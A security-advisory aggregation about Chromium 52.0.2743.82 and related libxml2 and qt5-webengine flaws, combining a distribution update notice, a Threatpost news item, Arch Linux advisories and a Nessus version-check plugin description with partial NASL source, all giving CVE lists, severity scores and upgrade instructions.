Chromium was updated to 52.0.2743.82 to fix the following security issues
(boo#989901):
- CVE-2016-1706: Sandbox escape in PPAPI
- CVE-2016-1707: URL spoofing on iOS
- CVE-2016-1708: Use-after-free in Extensions
- CVE-2016-1709: Heap-buffer-overflow in sfntly
- CVE-2016-1710: Same-origin bypass in Blink
- CVE-2016-1711: Same-origin bypass in Blink
- CVE-2016-5127: Use-after-free in Blink
- CVE-2016-5128: Same-origin bypass in V8
- CVE-2016-5129: Memory corruption in V8
- CVE-2016-5130: URL spoofing
- CVE-2016-5131: Use-after-free in libxml
- CVE-2016-5132: Limited same-origin bypass in Service Workers
- CVE-2016-5133: Origin confusion in proxy authentication
- CVE-2016-5134: URL leakage via PAC script
- CVE-2016-5135: Content-Security-Policy bypass
- CVE-2016-5136: Use after free in extensions
- CVE-2016-5137: History sniffing with HSTS and CSP
- CVE-2016-1705: Various fixes from internal audits, fuzzing and other
initiatives
{"threatpost": [{"lastseen": "2018-10-06T22:55:00", "description": "Google has patched a high-risk vulnerability in its Chrome browser that allows an attacker to escape the Chrome sandbox.\n\nThat vulnerability is one of 48 bugs fixed in version 52 of Chrome [released Wednesday](<http://googlechromereleases.blogspot.com/search/label/Stable%20updates>).\n\nFour dozen of those flaws are rated as high risks and Google paid out more than $22,000 in rewards to researchers who reported vulnerabilities to the company. Payment on an additional 11 bugs found by bug bounty hunters is pending, Google said.\n\nAmong the other serious vulnerabilities is a URL spoofing bug on iOS, a heap-buffer-overflow and four use-after-free vulnerabilities.\n\nThe bugs were found and reported via the Chrome bug bounty program. Longtime bug hunter Pinkie Pie earned $15,000 for a sandbox escape tied to Chrome\u2019s Pepper Plugin API (PPAPI) component of the browser that aims to make plugins more secure and portable.\n\nGoogle\u2019s sandbox technology isolates system processes in an effort to prevent malware from escaping the Chrome browser and infecting the host computer or allowing it to steal information from the PC or execute remote code. This is just the latest out of many out-of-sandbox escape flaws fixed by Google in previous browser updates. It\u2019s also just the latest sandbox escape flaw found by prolific hacker Pinkie Pie who earned $60,000 in 2012 at CanSecWest for finding several bugs including a sandbox escape bug. The following year Pinkie Pie earned another $50,000 at the Mobile Pwn2Own hacking contest for bugs once again tied to the Chrome sandbox escape bug.\n\nHere are the public bugs fixed in Chrome 52:\n\n[$15000][[610600](<https://crbug.com/610600>)] High CVE-2016-1706: Sandbox escape in PPAPI. Credit to Pinkie Pie \n[$3000][[622183](<https://crbug.com/622183>)] High CVE-2016-1707: URL spoofing on iOS. Credit to xisigr of Tencent\u2019s Xuanwu Lab \n[$TBD][[613949](<https://crbug.com/613949>)] High CVE-2016-1708: Use-after-free in Extensions. Credit to Adam Varsan \n[$TBD][[614934](<https://crbug.com/614934>)] High CVE-2016-1709: Heap-buffer-overflow in sfntly. Credit to ChenQin of Topsec Security Team \n[$TBD][[616907](<https://crbug.com/616907>)] High CVE-2016-1710: Same-origin bypass in Blink. Credit to Mariusz Mlynski \n[$TBD][[617495](<https://crbug.com/617495>)] High CVE-2016-1711: Same-origin bypass in Blink. Credit to Mariusz Mlynski \n[$TBD][[618237](<https://crbug.com/618237>)] High CVE-2016-5127: Use-after-free in Blink. Credit to cloudfuzzer \n[$TBD][[619166](<https://crbug.com/619166>)] High CVE-2016-5128: Same-origin bypass in V8. Credit to Anonymous \n[$TBD][[620553](<https://crbug.com/620553>)] High CVE-2016-5129: Memory corruption in V8. Credit to Jeonghoon Shin \n[$TBD][[623319](<https://crbug.com/623319>)] High CVE-2016-5130: URL spoofing. Credit to Wadih Matar \n[$TBD][[623378](<https://crbug.com/623378>)] High CVE-2016-5131: Use-after-free in libxml. Credit to Nick Wellnhofer \n[$1000][[607543](<https://crbug.com/607543>)] Medium CVE-2016-5132: Limited same-origin bypass in Service Workers. Credit to Ben Kelly \n[$1000][[613626](<https://crbug.com/613626>)] Medium CVE-2016-5133: Origin confusion in proxy authentication. Credit to Patch Eudor \n[$500][[593759](<https://crbug.com/593759>)] Medium CVE-2016-5134: URL leakage via PAC script. Credit to Paul Stone \n[$500][[605451](<https://crbug.com/605451>)] Medium CVE-2016-5135: Content-Security-Policy bypass. Credit to kingxwy \n[$TBD][[625393](<https://crbug.com/625393>)] Medium CVE-2016-5136: Use after free in extensions. Credit to Rob Wu \n[$TBD][[625945](<https://crbug.com/625945>)] Medium CVE-2016-5137: History sniffing with HSTS and CSP. Credit to Xiaoyin Liu\n", "cvss3": {}, "published": "2016-07-21T17:04:50", "type": "threatpost", "title": "Google Fixes 48 Bugs, Sandbox Escape, in Chrome", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-07-28T12:37:30", "id": "THREATPOST:C2E1563DBC065025E810CF457E1A802B", "href": "https://threatpost.com/google-fixes-sandbox-escape-in-chrome-again/119428/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "description": "- CVE-2016-1705 (arbitrary code execution)\n\nVarious fixes from internal audits, fuzzing and other initiatives.\n\n- CVE-2016-1706 (sandbox escape)\n\nSandbox escape in PPAPI. Credit to Pinkie Pie.\n\n- CVE-2016-1708 (arbitrary code execution)\n\nUse-after-free in Extensions. Credit to Adam Varsan.\n\n- CVE-2016-1709 (arbitrary code execution)\n\nHeap-buffer-overflow in sfntly. Credit to ChenQin of Topsec Security Team.\n\n- CVE-2016-1710, CVE-2016-1711 (same-origin policy bypass)\n\nSame-origin bypass in Blink. Credit to Mariusz Mlynski.\n\n- CVE-2016-5127 (arbitrary code execution)\n\nUse-after-free in Blink. Credit to cloudfuzzer.\n\n- CVE-2016-5128 (same-origin policy bypass)\n\nSame-origin bypass in V8.\n\n- CVE-2016-5129 (arbitrary code execution)\n\nMemory corruption in V8. Credit to Jeonghoon Shin.\n\n- CVE-2016-5130 (URL spoofing)\n\nURL spoofing. Credit to Wadih Matar.\n\n- CVE-2016-5131 (arbitrary code execution)\n\nUse-after-free in libxml. Credit to Nick Wellnhofer.\n\n- CVE-2016-5132 (same-origin policy bypass)\n\nLimited same-origin bypass in Service Workers. Credit to Ben Kelly.\n\n- CVE-2016-5133 (man-in-the-middle)\n\nOrigin confusion in proxy authentication. Credit to Patch Eudor.\n\n- CVE-2016-5134 (information leakage)\n\nURL leakage via PAC script. Credit to Paul Stone.\n\n- CVE-2016-5135 (content security policy bypass)\n\nContent-Security-Policy bypass. Credit to ShenYeYinJiu of Tencent\nSecurity Response Center, TSRC.\n\n- CVE-2016-5136 (arbitrary code execution)\n\nUse after free in extensions. Credit to Rob Wu.\n\n- CVE-2016-5137 (information leakage)\n\nHistory sniffing with HSTS and CSP. Credit to Xiaoyin Liu.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-07-24T00:00:00", "type": "archlinux", "title": "chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2016-07-24T00:00:00", "id": "ASA-201607-12", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-July/000672.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-06-03T14:53:01", "description": "Arch Linux Security Advisory ASA-201611-2\n=========================================\n\nSeverity: Critical\nDate : 2016-11-01\nCVE-ID : CVE-2016-4658 CVE-2016-5131\nPackage : libxml2\nType : arbitrary code execution\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package libxml2 before version 2.9.4+12+ge905f08-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 2.9.4+12+ge905f08-1.\n\n# pacman -Syu \"libxml2>=2.9.4+12+ge905f08-1\"\n\nThe problems have been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-4658 (arbitrary code execution)\n\nA use-after-free vulnerability via namespace nodes in XPointer ranges\nwas found in libxml2.\n\n- CVE-2016-5131 (arbitrary code execution)\n\nBugs in xmlXPathEvalExpr and xmlXPtrRangeToFunction can lead to a use-\nafter-free and allow control of the instruction pointer.\n\nImpact\n======\n\nA remote attacker is able to use a specially crafted XPath payload to\nexecute arbitrary code.\n\nReferences\n==========\n\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1384424\nhttps://git.gnome.org/browse/libxml2/commit/?id=c1d1f7121194036608bf555f08d3062a36fd344b\nhttps://git.gnome.org/browse/libxml2/commit/?id=9ab01a277d71f54d3143c2cf333c5c2e9aaedd9e\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=623378\nhttps://access.redhat.com/security/cve/CVE-2016-4658\nhttps://access.redhat.com/security/cve/CVE-2016-5131", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-01T00:00:00", "type": "archlinux", "title": "[ASA-201611-2] libxml2: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2016-11-01T00:00:00", "id": "ASA-201611-2", "href": "https://security.archlinux.org/ASA-201611-2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-03T14:52:57", "description": "Arch Linux Security Advisory ASA-201612-18\n==========================================\n\nSeverity: Critical\nDate : 2016-12-17\nCVE-ID : CVE-2016-5133 CVE-2016-5147 CVE-2016-5153 CVE-2016-5155\nCVE-2016-5161 CVE-2016-5166 CVE-2016-5170 CVE-2016-5171\nCVE-2016-5172 CVE-2016-5181 CVE-2016-5185 CVE-2016-5186\nCVE-2016-5187 CVE-2016-5188 CVE-2016-5192 CVE-2016-5198\nPackage : qt5-webengine\nType : multiple issues\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package qt5-webengine before version 5.7.1-1 is vulnerable to\nmultiple issues including arbitrary code execution, content spoofing,\ncross-site scripting, information disclosure and same-origin policy\nbypass.\n\nResolution\n==========\n\nUpgrade to 5.7.1-1.\n\n# pacman -Syu \"qt5-webengine>=5.7.1-1\"\n\nThe problems have been fixed upstream in version 5.7.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-5133 (content spoofing)\n\nGoogle Chrome before 52.0.2743.82 mishandles origin information during\nproxy authentication, which allows man-in-the-middle attackers to spoof\na proxy-authentication login prompt or trigger incorrect credential\nstorage by modifying the client-server data stream.\n\n- CVE-2016-5147 (cross-site scripting)\n\nBlink, as used in Google Chrome, mishandles deferred page loads, which\nallows remote attackers to inject arbitrary web script or HTML via a\ncrafted web site, aka \"Universal XSS (UXSS).\"\n\n- CVE-2016-5153 (arbitrary code execution)\n\nThe Web Animations implementation in Blink improperly relies on list\niteration, which allows remote attackers to cause a denial of service\n(use-after-destruction) or possibly have unspecified other impact via a\ncrafted web site.\n\n- CVE-2016-5155 (content spoofing)\n\nChromium does not properly validate access to the initial document,\nwhich allows remote attackers to spoof the address bar via a crafted\nweb site.\n\n- CVE-2016-5161 (information disclosure)\n\nThe EditingStyle::mergeStyle function in\nWebKit/Source/core/editing/EditingStyle.cpp in Blink mishandles custom\nproperties, which allows remote attackers to cause a denial of service\nor possibly have unspecified other impact via a crafted web site that\nleverages \"type confusion\" in the StylePropertySerializer class.\n\n- CVE-2016-5166 (information disclosure)\n\nThe download implementation in Chromium does not properly restrict\nsaving a file:// URL that is referenced by an http:// URL, which makes\nit easier for user-assisted remote attackers to discover NetNTLM hashes\nand conduct SMB relay attacks via a crafted web page that is accessed\nwith the \"Save page as\" menu choice.\n\n- CVE-2016-5170 (arbitrary code execution)\n\nWebKit/Source/bindings/modules/v8/V8BindingForModules.cpp in Blink does\nnot properly consider getter side effects during array key conversion,\nwhich allows remote attackers to cause a denial of service (use-after-\nfree) or possibly have unspecified other impact via crafted Indexed\nDatabase (aka IndexedDB) API calls.\n\n- CVE-2016-5171 (arbitrary code execution)\n\nWebKit/Source/bindings/templates/interface.cpp in Blink does not\nprevent certain constructor calls, which allows remote attackers to\ncause a denial of service (use-after-free) or possibly have unspecified\nother impact via crafted JavaScript code.\n\n- CVE-2016-5172 (information disclosure)\n\nThe parser in Google V8 mishandles scopes, which allows remote\nattackers to obtain sensitive information from arbitrary memory\nlocations via crafted JavaScript code.\n\n- CVE-2016-5181 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5185 (arbitrary code execution)\n\nAn use after free flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5186 (information disclosure)\n\nAn out of bounds read flaw was found in the DevTools component of the\nChromium browser.\n\n- CVE-2016-5187 (content spoofing)\n\nAn URL spoofing flaw was found in the Chromium browser.\n\n- CVE-2016-5188 (content spoofing)\n\nAn UI spoofing flaw was found in the Chromium browser.\n\n- CVE-2016-5192 (same-origin policy bypass)\n\nA cross-origin bypass flaw was found in the Blink component of the\nChromium browser.\n\n- CVE-2016-5198 (arbitrary code execution)\n\nAn out of bounds memory access flaw was found in the V8 component of\nthe Chromium browser.\n\nImpact\n======\n\nA remote attacker can access sensitive information, spoof content,\nbypass security measures or execute arbitrary code on the affected\nhost.\n\nReferences\n==========\n\nhttps://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.7.1?h=5.7\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=613626\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=628942\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=631052\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=630662\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1372216\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=622420\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=616429\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=641101\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=643357\nhttps://chromereleases.googleblog.com/2016/09/stable-channel-update-for-desktop_13.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=616386\nhttps://googlechromereleases.blogspot.fr/2016/10/stable-channel-update-for-desktop.html\nhttps://chromereleases.googleblog.com/2016/11/stable-channel-update-for-desktop.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=659475\nhttps://access.redhat.com/security/cve/CVE-2016-5133\nhttps://access.redhat.com/security/cve/CVE-2016-5147\nhttps://access.redhat.com/security/cve/CVE-2016-5153\nhttps://access.redhat.com/security/cve/CVE-2016-5155\nhttps://access.redhat.com/security/cve/CVE-2016-5161\nhttps://access.redhat.com/security/cve/CVE-2016-5166\nhttps://access.redhat.com/security/cve/CVE-2016-5170\nhttps://access.redhat.com/security/cve/CVE-2016-5171\nhttps://access.redhat.com/security/cve/CVE-2016-5172\nhttps://access.redhat.com/security/cve/CVE-2016-5181\nhttps://access.redhat.com/security/cve/CVE-2016-5185\nhttps://access.redhat.com/security/cve/CVE-2016-5186\nhttps://access.redhat.com/security/cve/CVE-2016-5187\nhttps://access.redhat.com/security/cve/CVE-2016-5188\nhttps://access.redhat.com/security/cve/CVE-2016-5192\nhttps://access.redhat.com/security/cve/CVE-2016-5198", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-12-17T00:00:00", "type": "archlinux", "title": "[ASA-201612-18] qt5-webengine: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5133", "CVE-2016-5147", "CVE-2016-5153", "CVE-2016-5155", "CVE-2016-5161", "CVE-2016-5166", "CVE-2016-5170", "CVE-2016-5171", "CVE-2016-5172", "CVE-2016-5181", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5198"], "modified": "2016-12-17T00:00:00", "id": "ASA-201612-18", "href": "https://security.archlinux.org/ASA-201612-18", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T14:25:18", "description": "The version of Google Chrome installed on the remote Windows host is prior to 52.0.2743.82. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple unspecified vulnerabilities exist that allow a remote attacker to cause a denial of service condition or possibly have other impact via unknown vectors.\n (CVE-2016-1705)\n\n - A sandbox protection bypass vulnerability exists in PPAPI due to a failure to validate the origin of IPC messages to the plugin broker process. An unauthenticated, remote attacker can exploit this to bypass the sandbox. (CVE-2016-1706)\n\n - A use-after-free error exists in Extensions due to a failure to consider object lifetimes during progress observation. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code.\n (CVE-2016-1708)\n\n - An array indexing error exists in the ByteArray::Get() function in data/byte_array.cc due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n (CVE-2016-1709)\n\n - A same-origin bypass vulnerability exists in Blink due to a failure to prevent window creation by a deferred frame. A remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-1710)\n\n - A same-origin bypass vulnerability exists in Blink due to a failure to disable frame navigation during a detach operation on a DocumentLoader object. A remote attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-1711)\n\n - A use-after-free error exists in Blink in the previousLinePosition() function. An unauthenticated, remote attacker can exploit this, via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-5127)\n\n - A same-origin bypass vulnerability exists in Google V8 due to a failure to prevent API interceptors from modifying a store target without setting a property. A remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-5128)\n\n - A flaw exists in V8 due to improper processing of left-trimmed objects. An unauthenticated, remote attacker can exploit this, via crafted JavaScript code, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-5129)\n\n - A flaw exists that is triggered when handling two forward navigations that compete in different frames. A remote attacker can exploit this to conduct a URL spoofing attack. (CVE-2016-5130)\n\n - A use-after-free error exists in libxml2 in the xmlXPtrRangeToFunction() function. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2016-5131)\n\n - A same-origin bypass vulnerability exists in the Service Workers subsystem due to a failure to properly implement the Secure Contexts specification during decisions about whether to control a subframe. A remote attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-5132)\n\n - A flaw exists in the handling of origin information during proxy authentication that allows a man-in-the-middle attacker to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream. (CVE-2016-5133)\n\n - A validation flaw exists in the Proxy Auto-Config (PAC) feature due to a failure to ensure that URL information is restricted to a scheme, host, and port. A remote attacker can exploit this to disclose credentials by operating a server with a PAC script. (CVE-2016-5134)\n\n - A cross-origin bypass vulnerability exists in Blink due to a failure to consider referrer-policy information inside an HTML document during a preload request. A remote attacker can exploit this to bypass the Content Security Policy (CSP) protection mechanism.\n (CVE-2016-5135)\n\n - A use-after-free error exists in Extensions that allows a remote attacker to dereference already freed memory, resulting in the execution of arbitrary code with elevated privileges. (CVE-2016-5136)\n\n - An information disclosure vulnerability exists in Blink when handling HTTP vs HTTPs ports in source expressions.\n An unauthenticated, remote attacker can exploit this to determine whether a specific HTTP Strict Transport Security (HSTS) web site has been visited by reading a CSP report. (CVE-2016-5137)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-07-29T00:00:00", "type": "nessus", "title": "Google Chrome < 52.0.2743.82 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_52_0_2743_82.NASL", "href": "https://www.tenable.com/plugins/nessus/92628", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92628);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1705\",\n \"CVE-2016-1706\",\n \"CVE-2016-1708\",\n \"CVE-2016-1709\",\n \"CVE-2016-1710\",\n \"CVE-2016-1711\",\n \"CVE-2016-5127\",\n \"CVE-2016-5128\",\n \"CVE-2016-5129\",\n \"CVE-2016-5130\",\n \"CVE-2016-5131\",\n \"CVE-2016-5132\",\n \"CVE-2016-5133\",\n \"CVE-2016-5134\",\n \"CVE-2016-5135\",\n \"CVE-2016-5136\",\n \"CVE-2016-5137\"\n );\n script_bugtraq_id(92053);\n\n script_name(english:\"Google Chrome < 52.0.2743.82 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 52.0.2743.82. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple unspecified vulnerabilities exist that allow a\n remote attacker to cause a denial of service condition\n or possibly have other impact via unknown vectors.\n (CVE-2016-1705)\n\n - A sandbox protection bypass vulnerability exists in\n PPAPI due to a failure to validate the origin of IPC\n messages to the plugin broker process. An\n unauthenticated, remote attacker can exploit this to\n bypass the sandbox. (CVE-2016-1706)\n\n - A use-after-free error exists in Extensions due to a\n failure to consider object lifetimes during progress\n observation. An unauthenticated, remote attacker can\n exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code.\n (CVE-2016-1708)\n\n - An array indexing error exists in the ByteArray::Get()\n function in data/byte_array.cc due to improper \n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this to cause a heap-based\n buffer overflow, resulting in a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-1709)\n\n - A same-origin bypass vulnerability exists in Blink due\n to a failure to prevent window creation by a deferred\n frame. A remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-1710)\n\n - A same-origin bypass vulnerability exists in Blink due\n to a failure to disable frame navigation during a detach\n operation on a DocumentLoader object. A remote attacker\n can exploit this to bypass the same-origin policy.\n (CVE-2016-1711)\n\n - A use-after-free error exists in Blink in the\n previousLinePosition() function. An unauthenticated,\n remote attacker can exploit this, via crafted JavaScript\n code involving an @import at-rule in a Cascading Style\n Sheets (CSS) token sequence in conjunction with a\n rel=import attribute of a LINK element, to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2016-5127)\n\n - A same-origin bypass vulnerability exists in Google V8\n due to a failure to prevent API interceptors from\n modifying a store target without setting a property. A\n remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-5128)\n\n - A flaw exists in V8 due to improper processing of\n left-trimmed objects. An unauthenticated, remote\n attacker can exploit this, via crafted JavaScript code,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2016-5129)\n\n - A flaw exists that is triggered when handling two\n forward navigations that compete in different frames. A\n remote attacker can exploit this to conduct a URL\n spoofing attack. (CVE-2016-5130)\n\n - A use-after-free error exists in libxml2 in the\n xmlXPtrRangeToFunction() function. An unauthenticated,\n remote attacker can exploit this to dereference already\n freed memory, resulting in the execution of arbitrary\n code. (CVE-2016-5131)\n\n - A same-origin bypass vulnerability exists in the Service\n Workers subsystem due to a failure to properly implement\n the Secure Contexts specification during decisions about\n whether to control a subframe. A remote attacker can\n exploit this to bypass the same-origin policy.\n (CVE-2016-5132)\n\n - A flaw exists in the handling of origin information\n during proxy authentication that allows a\n man-in-the-middle attacker to spoof a\n proxy-authentication login prompt or trigger incorrect\n credential storage by modifying the client-server data\n stream. (CVE-2016-5133)\n\n - A validation flaw exists in the Proxy Auto-Config (PAC)\n feature due to a failure to ensure that URL information\n is restricted to a scheme, host, and port. A remote\n attacker can exploit this to disclose credentials by\n operating a server with a PAC script. (CVE-2016-5134)\n\n - A cross-origin bypass vulnerability exists in Blink due\n to a failure to consider referrer-policy information\n inside an HTML document during a preload request. A\n remote attacker can exploit this to bypass the Content\n Security Policy (CSP) protection mechanism.\n (CVE-2016-5135)\n\n - A use-after-free error exists in Extensions that allows\n a remote attacker to dereference already freed memory,\n resulting in the execution of arbitrary code with\n elevated privileges. (CVE-2016-5136)\n\n - An information disclosure vulnerability exists in Blink\n when handling HTTP vs HTTPs ports in source expressions.\n An unauthenticated, remote attacker can exploit this to\n determine whether a specific HTTP Strict Transport\n Security (HSTS) web site has been visited by reading a\n CSP report. (CVE-2016-5137)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2016/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c7c32d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 52.0.2743.82 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 